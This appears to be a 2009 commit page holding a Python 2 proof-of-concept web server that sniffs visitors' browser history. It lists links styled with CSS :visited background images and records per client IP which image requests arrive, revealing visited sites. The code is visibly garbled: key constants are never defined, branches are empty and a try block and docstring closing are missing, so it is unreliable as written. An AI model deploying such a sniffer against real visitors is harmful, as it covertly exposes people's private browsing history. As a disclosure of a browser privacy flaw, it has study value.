babsniff_history_css /

Full commit
#!/usr/bin/env python
# encoding: utf-8

"""Simple history sniffer - Sniff the browser history using only CSS and an unsafe CSS optimization.

This simple webserver sniffs and outputs the history using only css.
Every browser which renders background images for span tags inside a link should be affected.

It currently only checks for some selected websites, since I don't really want to create a full fledged history ripper.
Konqueror seems to be immune: It also (pre-)loads the "visited"-images from not visited links. 

Please don't let your browser load anything depending on the :visited state of a link tag!
That publicizes private information! In short: Don't keep repeating Ennesbys Mistake: 

- Mistake: 
- Effects: 


    - python
      start the server at port 8000. You can now point your browser to to get sniffed :)

To change the sites which are being checked, simply edit the "website_seed" list. 


__copyright__ = """ 
  history_sniffer - Sniff the browser history using only CSS and an unsafe CSS optimization.
© 2009 Copyright by Arne Babenhauserheide

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 3 of the License, or
  (at your option) any later version.

  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with this program; if not, write to the Free Software
  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston,
  MA 02110-1301 USA


#: A list of initial websites
website_seed = ["", "", "", "blubber.blau"]

# The basic HTTP Server from Python. 
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

# hashing to get class names from urls
from hashlib import md5

# And help output
from sys import argv
if "--help" in argv:

#: The port to use
PORT = 8000

#: A dict of crawled/crawling people: {IP: {new: [urls...], found: [site1, site2, ...]}
hosts = {}

#: The number of links to test per reload

#: Time between refreshes in seconds = time between tests

# Read in an image
f = open("1w6-favicon-32.png", "r")
#: Link background image

# Spoofed style class prefix

def single_link(site):
    """Create the html and style class definition for a single link."""
    link = '<span id="' + SPOOFED_ID_PREFIX + str(md5(site).hexdigest()) + '"><a href="' + site + '"><span> - ' + site + '</span></a></span>'
    return link

def create_style(links):
    """Create the spoofing style tag for the site. """
    style = "<style><!--"
    for link in links:
        img_url = "/img/" + str(link) + ".png"
        style += "#" + SPOOFED_ID_PREFIX  + str(md5(link).hexdigest()) + " a:visited {color: red; background-image: url(" + img_url + ");}\n"
    style += "--></style>"
    return style

def spoof_html(IP):
    """Return html code for a given IP."""
    # first the basic html
    html = '<html><head>'
    # If we have sites to check, add a refresh
    if hosts[IP]["new"]:
        html += '<meta http-equiv="refresh" content="' + str(REFRESH_TIME) + '; URL=/">'

    # Then get the links to test this time, remove them from the IPs list of links to test
    links = hosts[IP]["new"][:LINKS_PER_REFRESH]
    hosts[IP]["new"] = hosts[IP]["new"][LINKS_PER_REFRESH:]
    # Now add a spoofed style sheet
    html += create_style(links)

    html += '</head><body>'
    # If we have no more sites to test, print finished
    if not links:
        html += "<h1>Finished</h1>"
        html += "<h1>Checking sites</h1>"
    # Add the links to the html
    html += "\n".join([single_link(link) for link in links])

    # Also add the list of already found sites
    html += "<h1>Found sites in YOUR history</h1>"
    html += "<br />".join(hosts[IP]["found"])

    print hosts
    # finish the html
    html += "</body></html>"
    return html
def process_Ip(IP):
    """Check if an IP is already known and has new sites. If it isn't known, create an entry for it. If it doesn't have new sites, return False"""
    if not IP in hosts:
        # Prepare and add the IP entry.
        # We check first for the initial websites. 
        new = website_seed
        found = []
        hosts[IP] = {"new": new, "found": found}
	print hosts
    if not hosts[IP]["new"]:
        return False
        return True

def process_image_request(IP, img_name):
    """Add the site to which the spoofed link pointed to the known pages of the IP and remove it from checking."""
    # sanity check - people might anonymize their IP
    if not IP in hosts:
        print("unkown IP: " + IP)
        return ""
    # if we know the URL, mark it as found
    if not img_name[:-4] in hosts[IP]["found"]: 
    elif img_name[:-4] in hosts[IP]["found"]:
        print("Error: requested image for already checked site." + img_name[:-4])
        print("Error: requested image for not checked site." + img_name[:-4])

    # Always return the image data if the IP is known.
    return BG_IMAGE_DATA

# A basic HTTPHandler. 
class HTTPHtmlHandler(BaseHTTPRequestHandler): 
    """Simple handler for Get requests, using the before defined func."""

    def do_GET(self): 
        # First we need the type: html
        # first get the IP
        IP = self.client_address[0]

        # Now prepare the IP, if we don't yet know it

        # do image or default requests.
        if self.path.startswith("/img/"):
            self.send_header("Content-Type", "image/png")
            self.wfile.write(process_image_request(IP, self.path[5:]))
            # Idea: return an image, so people see how they get sniffed. 
            self.send_header("Content-Type", "text/html")
def main():
        server = HTTPServer(('', PORT), HTTPHtmlHandler)
        print('started httpserver...')
	print('point your browser to to get sniffed')
    except KeyboardInterrupt:
        print('^C received, shutting down server')

if __name__ == "__main__":